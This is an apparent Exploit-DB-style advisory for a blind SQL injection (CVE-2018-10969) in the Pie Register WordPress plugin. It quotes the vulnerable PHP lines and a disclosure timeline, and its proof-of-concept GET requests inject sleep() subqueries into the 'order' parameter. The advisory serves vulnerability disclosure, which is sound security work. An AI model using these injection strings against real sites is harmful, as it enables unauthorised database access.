WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection

vendor:

Pie Register

by:

Manuel García Cárdenas

9.8

CVSS

CRITICAL

Blind SQL Injection

CWE

Product Name: Pie Register

Affected Version From: Pie Register <= 3.0.9

Affected Version To: Pie Register <= 3.0.9

Patch Exists: NO

Related CWE: CVE-2018-10969

CPE: a:pieregister:pie_register

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WordPress

2018

WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection

This bug was found using the portal in the files: /pie-register/classes/invitation_code_pagination.php: if ( isset( $_GET['order'] ) && $_GET['order'] ) /pie-register/classes/invitation_code_pagination.php: $order = $_GET['order']; And when the query is executed, the parameter "order" it is not sanitized. /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order ); The following URL have been confirmed to all suffer from Time Based SQL Injection. GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1(2 seconds of response) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1(30 seconds of response)

Mitigation:

Disable plugin until a fix is available

Source

Exploit-DB raw data:

# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# This bug was found using the portal in the files:
# /pie-register/classes/invitation_code_pagination.php:    if ( isset(
# $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:    $order =
# $_GET['order'];
# And when the query is executed, the parameter "order" it is not sanitized.
# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );

# IV. PROOF OF CONCEPT
# The following URL have been confirmed to all suffer from Time Based SQL Injection.

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
(original)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
HTTP/1.1(2 seconds of response)

GET
/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
HTTP/1.1(30 seconds of response)

# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists

# VII. Solution
# Disable plugin until a fix is available